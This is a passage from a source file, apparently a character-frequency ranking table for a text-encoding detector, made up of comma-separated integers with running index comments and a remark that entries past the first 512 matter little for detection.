3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032
574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048
3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064
5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080
5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096
3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112
3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128
1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144
2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160
5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176
1561,2674,1452,4113,1375,5549,5550, 47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192
1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208
3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224
919,2352,2975,2353,1270,4727,4115, 73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240
1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256
4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272
5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288
2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304
3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320
516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336
1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352
2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368
2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384
5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400
5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416
5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432
2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448
2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464
1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480
4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496
3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512
3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528
4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544
4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560
2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576
2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592
5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608
4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624
5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640
4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656
502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672
121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688
1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704
3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720
4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736
1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752
5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768
2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784
2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800
3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816
5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832
1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848
3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864
5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880
1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896
5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912
2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928
3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944
2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960
3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976
3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992
3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008
4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024
803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040
2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056
4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072
3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088
5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104
1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120
5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136
425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152
1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168
479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184
4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200
1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216
4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232
1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248
433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264
3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280
4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296
5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312
938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328
3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344
890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360
2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376 #last 512
#Everything below is of no interest for detection purpose
2522,1613,4812,5799,3345,3945,2523,5800,4162,5801,1637,4163,2471,4813,3946,5802, # 5392
2500,3034,3800,5803,5804,2195,4814,5805,2163,5806,5807,5808,5809,5810,5811,5812, # 5408
5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828, # 5424
5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844, # 5440
5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856,5857,5858,5859,5860, # 5456
5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872,5873,5874,5875,5876, # 5472
5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888,5889,5890,5891,5892, # 5488
5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,5906,5907,5908, # 5504
5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,5921,5922,5923,5924, # 5520
5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936,5937,5938,5939,5940, # 5536
5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952,5953,5954,5955,5956, # 5552
5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968,5969,5970,5971,5972, # 5568
5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984,5985,5986,5987,5988, # 5584
5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004, # 5600
6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020, # 5616
6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032,6033,6034,6035,6036, # 5632
6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052, # 5648
6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068, # 5664
6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084, # 5680
6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100, # 5696
6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116, # 5712
6117,6118,6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,6132, # 5728
6133,6134,6135,6136,6137,6138,6139,6140,6141,6142,6143,6144,6145,6146,6147,6148, # 5744
6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163,6164, # 5760
6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179,6180, # 5776
6181,6182,6183,6184,6185,6186,6187,6188,6189,6190,6191,6192,6193,6194,6195,6196, # 5792
6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210,6211,6212, # 5808
6213,6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,3670,6224,6225,6226,6227, # 5824
6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241,6242,6243, # 5840
6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,6254,6255,6256,6257,6258,6259, # 5856
6260,6261,6262,6263,6264,6265,6266,6267,6268,6269,6270,6271,6272,6273,6274,6275, # 5872
6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,4815,6286,6287,6288,6289,6290, # 5888
6291,6292,4816,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,6303,6304,6305, # 5904
6306,6307,6308,6309,6310,6311,4817,4818,6312,6313,6314,6315,6316,6317,6318,4819, # 5920
6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333,6334, # 5936
6335,6336,6337,4820,6338,6339,6340,6341,6342,6343,6344,6345,6346,6347,6348,6349, # 5952
6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363,6364,6365, # 5968
6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379,6380,6381, # 5984
6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395,6396,6397, # 6000
6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,3441,6411,6412, # 6016
6413,6414,6415,6416,6417,6418,6419,6420,6421,6422,6423,6424,6425,4440,6426,6427, # 6032
6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,6439,6440,6441,6442,6443, # 6048
6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,4821,6455,6456,6457,6458, # 6064
6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472,6473,6474, # 6080
6475,6476,6477,3947,3948,6478,6479,6480,6481,3272,4441,6482,6483,6484,6485,4442, # 6096
6486,6487,6488,6489,6490,6491,6492,6493,6494,6495,6496,4822,6497,6498,6499,6500, # 6112
6501,6502,6503,6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516, # 6128
6517,6518,6519,6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532, # 6144
6533,6534,6535,6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548, # 6160
6549,6550,6551,6552,6553,6554,6555,6556,2784,6557,4823,6558,6559,6560,6561,6562, # 6176
6563,6564,6565,6566,6567,6568,6569,3949,6570,6571,6572,4824,6573,6574,6575,6576, # 6192
6577,6578,6579,6580,6581,6582,6583,4825,6584,6585,6586,3950,2785,6587,6588,6589, # 6208
6590,6591,6592,6593,6594,6595,6596,6597,6598,6599,6600,6601,6602,6603,6604,6605, # 6224
6606,6607,6608,6609,6610,6611,6612,4826,6613,6614,6615,4827,6616,6617,6618,6619, # 6240
6620,6621,6622,6623,6624,6625,4164,6626,6627,6628,6629,6630,6631,6632,6633,6634, # 6256
3547,6635,4828,6636,6637,6638,6639,6640,6641,6642,3951,2984,6643,6644,6645,6646, # 6272
6647,6648,6649,4165,6650,4829,6651,6652,4830,6653,6654,6655,6656,6657,6658,6659, # 6288
6660,6661,6662,4831,6663,6664,6665,6666,6667,6668,6669,6670,6671,4166,6672,4832, # 6304
3952,6673,6674,6675,6676,4833,6677,6678,6679,4167,6680,6681,6682,3198,6683,6684, # 6320
6685,6686,6687,6688,6689,6690,6691,6692,6693,6694,6695,6696,6697,4834,6698,6699, # 6336
6700,6701,6702,6703,6704,6705,6706,6707,6708,6709,6710,6711,6712,6713,6714,6715, # 6352
6716,6717,6718,6719,6720,6721,6722,6723,6724,6725,6726,6727,6728,6729,6730,6731, # 6368
6732,6733,6734,4443,6735,6736,6737,6738,6739,6740,6741,6742,6743,6744,6745,4444, # 6384
6746,6747,6748,6749,6750,6751,6752,6753,6754,6755,6756,6757,6758,6759,6760,6761, # 6400
6762,6763,6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777, # 6416
6778,6779,6780,6781,4168,6782,6783,3442,6784,6785,6786,6787,6788,6789,6790,6791, # 6432
4169,6792,6793,6794,6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806, # 6448
6807,6808,6809,6810,6811,4835,6812,6813,6814,4445,6815,6816,4446,6817,6818,6819, # 6464
6820,6821,6822,6823,6824,6825,6826,6827,6828,6829,6830,6831,6832,6833,6834,6835, # 6480
3548,6836,6837,6838,6839,6840,6841,6842,6843,6844,6845,6846,4836,6847,6848,6849, # 6496
6850,6851,6852,6853,6854,3953,6855,6856,6857,6858,6859,6860,6861,6862,6863,6864, # 6512
6865,6866,6867,6868,6869,6870,6871,6872,6873,6874,6875,6876,6877,3199,6878,6879, # 6528
6880,6881,6882,4447,6883,6884,6885,6886,6887,6888,6889,6890,6891,6892,6893,6894, # 6544
6895,6896,6897,6898,6899,6900,6901,6902,6903,6904,4170,6905,6906,6907,6908,6909, # 6560
6910,6911,6912,6913,6914,6915,6916,6917,6918,6919,6920,6921,6922,6923,6924,6925, # 6576
6926,6927,4837,6928,6929,6930,6931,6932,6933,6934,6935,6936,3346,6937,6938,4838, # 6592
6939,6940,6941,4448,6942,6943,6944,6945,6946,4449,6947,6948,6949,6950,6951,6952, # 6608
6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966,6967,6968, # 6624
6969,6970,6971,6972,6973,6974,6975,6976,6977,6978,6979,6980,6981,6982,6983,6984, # 6640
6985,6986,6987,6988,6989,6990,6991,6992,6993,6994,3671,6995,6996,6997,6998,4839, # 6656
6999,7000,7001,7002,3549,7003,7004,7005,7006,7007,7008,7009,7010,7011,7012,7013, # 6672
7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027,7028,7029, # 6688
7030,4840,7031,7032,7033,7034,7035,7036,7037,7038,4841,7039,7040,7041,7042,7043, # 6704
7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058,7059, # 6720
7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,2985,7071,7072,7073,7074, # 6736
7075,7076,7077,7078,7079,7080,4842,7081,7082,7083,7084,7085,7086,7087,7088,7089, # 6752
7090,7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105, # 6768
7106,7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,4450,7119,7120, # 6784
7121,7122,7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136, # 6800
7137,7138,7139,7140,7141,7142,7143,4843,7144,7145,7146,7147,7148,7149,7150,7151, # 6816
7152,7153,7154,7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167, # 6832
7168,7169,7170,7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183, # 6848
7184,7185,7186,7187,7188,4171,4172,7189,7190,7191,7192,7193,7194,7195,7196,7197, # 6864
7198,7199,7200,7201,7202,7203,7204,7205,7206,7207,7208,7209,7210,7211,7212,7213, # 6880
7214,7215,7216,7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229, # 6896
7230,7231,7232,7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245, # 6912
7246,7247,7248,7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261, # 6928
7262,7263,7264,7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277, # 6944
7278,7279,7280,7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293, # 6960
7294,7295,7296,4844,7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308, # 6976
7309,7310,7311,7312,7313,7314,7315,7316,4451,7317,7318,7319,7320,7321,7322,7323, # 6992
7324,7325,7326,7327,7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339, # 7008
7340,7341,7342,7343,7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,4173,7354, # 7024
7355,4845,7356,7357,7358,7359,7360,7361,7362,7363,7364,7365,7366,7367,7368,7369, # 7040
7370,7371,7372,7373,7374,7375,7376,7377,7378,7379,7380,7381,7382,7383,7384,7385, # 7056
7386,7387,7388,4846,7389,7390,7391,7392,7393,7394,7395,7396,7397,7398,7399,7400, # 7072
7401,7402,7403,7404,7405,3672,7406,7407,7408,7409,7410,7411,7412,7413,7414,7415, # 7088
7416,7417,7418,7419,7420,7421,7422,7423,7424,7425,7426,7427,7428,7429,7430,7431, # 7104
7432,7433,7434,7435,7436,7437,7438,7439,7440,7441,7442,7443,7444,7445,7446,7447, # 7120
7448,7449,7450,7451,7452,7453,4452,7454,3200,7455,7456,7457,7458,7459,7460,7461, # 7136
7462,7463,7464,7465,7466,7467,7468,7469,7470,7471,7472,7473,7474,4847,7475,7476, # 7152
7477,3133,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,7488,7489,7490,7491, # 7168
7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,3347,7503,7504,7505,7506, # 7184
7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519,7520,7521,4848, # 7200
7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535,7536,7537, # 7216
7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,3801,4849,7550,7551, # 7232
7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567, # 7248
7568,7569,3035,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582, # 7264
7583,7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598, # 7280
7599,7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614, # 7296
7615,7616,4850,7617,7618,3802,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628, # 7312
7629,7630,7631,7632,4851,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643, # 7328
7644,7645,7646,7647,7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659, # 7344
7660,7661,7662,7663,7664,7665,7666,7667,7668,7669,7670,4453,7671,7672,7673,7674, # 7360
7675,7676,7677,7678,7679,7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690, # 7376
7691,7692,7693,7694,7695,7696,7697,3443,7698,7699,7700,7701,7702,4454,7703,7704, # 7392
7705,7706,7707,7708,7709,7710,7711,7712,7713,2472,7714,7715,7716,7717,7718,7719, # 7408
7720,7721,7722,7723,7724,7725,7726,7727,7728,7729,7730,7731,3954,7732,7733,7734, # 7424
7735,7736,7737,7738,7739,7740,7741,7742,7743,7744,7745,7746,7747,7748,7749,7750, # 7440
3134,7751,7752,4852,7753,7754,7755,4853,7756,7757,7758,7759,7760,4174,7761,7762, # 7456
7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,7777,7778, # 7472
7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791,7792,7793,7794, # 7488
7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,4854,7806,7807,7808,7809, # 7504
7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824,7825, # 7520
4855,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7536
7841,7842,7843,7844,7845,7846,7847,3955,7848,7849,7850,7851,7852,7853,7854,7855, # 7552
7856,7857,7858,7859,7860,3444,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870, # 7568
7871,7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886, # 7584
7887,7888,7889,7890,7891,4175,7892,7893,7894,7895,7896,4856,4857,7897,7898,7899, # 7600
7900,2598,7901,7902,7903,7904,7905,7906,7907,7908,4455,7909,7910,7911,7912,7913, # 7616
7914,3201,7915,7916,7917,7918,7919,7920,7921,4858,7922,7923,7924,7925,7926,7927, # 7632
7928,7929,7930,7931,7932,7933,7934,7935,7936,7937,7938,7939,7940,7941,7942,7943, # 7648
7944,7945,7946,7947,7948,7949,7950,7951,7952,7953,7954,7955,7956,7957,7958,7959, # 7664
7960,7961,7962,7963,7964,7965,7966,7967,7968,7969,7970,7971,7972,7973,7974,7975, # 7680
7976,7977,7978,7979,7980,7981,4859,7982,7983,7984,7985,7986,7987,7988,7989,7990, # 7696
7991,7992,7993,7994,7995,7996,4860,7997,7998,7999,8000,8001,8002,8003,8004,8005, # 7712
8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,4176,8017,8018,8019,8020, # 7728
8021,8022,8023,4861,8024,8025,8026,8027,8028,8029,8030,8031,8032,8033,8034,8035, # 7744
8036,4862,4456,8037,8038,8039,8040,4863,8041,8042,8043,8044,8045,8046,8047,8048, # 7760
8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,8064, # 7776
8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,8080, # 7792
8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096, # 7808
8097,8098,8099,4864,4177,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110, # 7824
8111,8112,8113,8114,8115,8116,8117,8118,8119,8120,4178,8121,8122,8123,8124,8125, # 7840
8126,8127,8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141, # 7856
8142,8143,8144,8145,4865,4866,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155, # 7872
8156,8157,8158,8159,8160,8161,8162,8163,8164,8165,4179,8166,8167,8168,8169,8170, # 7888
8171,8172,8173,8174,8175,8176,8177,8178,8179,8180,8181,4457,8182,8183,8184,8185, # 7904
8186,8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201, # 7920
8202,8203,8204,8205,8206,8207,8208,8209,8210,8211,8212,8213,8214,8215,8216,8217, # 7936
8218,8219,8220,8221,8222,8223,8224,8225,8226,8227,8228,8229,8230,8231,8232,8233, # 7952
8234,8235,8236,8237,8238,8239,8240,8241,8242,8243,8244,8245,8246,8247,8248,8249, # 7968
8250,8251,8252,8253,8254,8255,8256,3445,8257,8258,8259,8260,8261,8262,4458,8263, # 7984
8264,8265,8266,8267,8268,8269,8270,8271,8272,4459,8273,8274,8275,8276,3550,8277, # 8000
8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,8288,8289,4460,8290,8291,8292, # 8016
8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,8304,8305,8306,8307,4867, # 8032
8308,8309,8310,8311,8312,3551,8313,8314,8315,8316,8317,8318,8319,8320,8321,8322, # 8048
8323,8324,8325,8326,4868,8327,8328,8329,8330,8331,8332,8333,8334,8335,8336,8337, # 8064
8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,8352,8353, # 8080
8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,4869,4461,8364,8365,8366,8367, # 8096
8368,8369,8370,4870,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382, # 8112
8383,8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398, # 8128
8399,8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,4871,8411,8412,8413, # 8144
8414,8415,8416,8417,8418,8419,8420,8421,8422,4462,8423,8424,8425,8426,8427,8428, # 8160
8429,8430,8431,8432,8433,2986,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443, # 8176
8444,8445,8446,8447,8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459, # 8192
8460,8461,8462,8463,8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475, # 8208
8476,8477,8478,4180,8479,8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490, # 8224
8491,8492,8493,8494,8495,8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506, # 8240
8507,8508,8509,8510,8511,8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522, # 8256
8523,8524,8525,8526,8527,8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538, # 8272
8539,8540,8541,8542,8543,8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554, # 8288
8555,8556,8557,8558,8559,8560,8561,8562,8563,8564,4872,8565,8566,8567,8568,8569, # 8304
8570,8571,8572,8573,4873,8574,8575,8576,8577,8578,8579,8580,8581,8582,8583,8584, # 8320
8585,8586,8587,8588,8589,8590,8591,8592,8593,8594,8595,8596,8597,8598,8599,8600, # 8336
8601,8602,8603,8604,8605,3803,8606,8607,8608,8609,8610,8611,8612,8613,4874,3804, # 8352
8614,8615,8616,8617,8618,8619,8620,8621,3956,8622,8623,8624,8625,8626,8627,8628, # 8368
8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,2865,8639,8640,8641,8642,8643, # 8384
8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,8656,4463,8657,8658, # 8400
8659,4875,4876,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,8672, # 8416
8673,8674,8675,8676,8677,8678,8679,8680,8681,4464,8682,8683,8684,8685,8686,8687, # 8432
8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703, # 8448
8704,8705,8706,8707,8708,8709,2261,8710,8711,8712,8713,8714,8715,8716,8717,8718, # 8464
8719,8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,4181, # 8480
8734,8735,8736,8737,8738,8739,8740,8741,8742,8743,8744,8745,8746,8747,8748,8749, # 8496
8750,8751,8752,8753,8754,8755,8756,8757,8758,8759,8760,8761,8762,8763,4877,8764, # 8512
8765,8766,8767,8768,8769,8770,8771,8772,8773,8774,8775,8776,8777,8778,8779,8780, # 8528
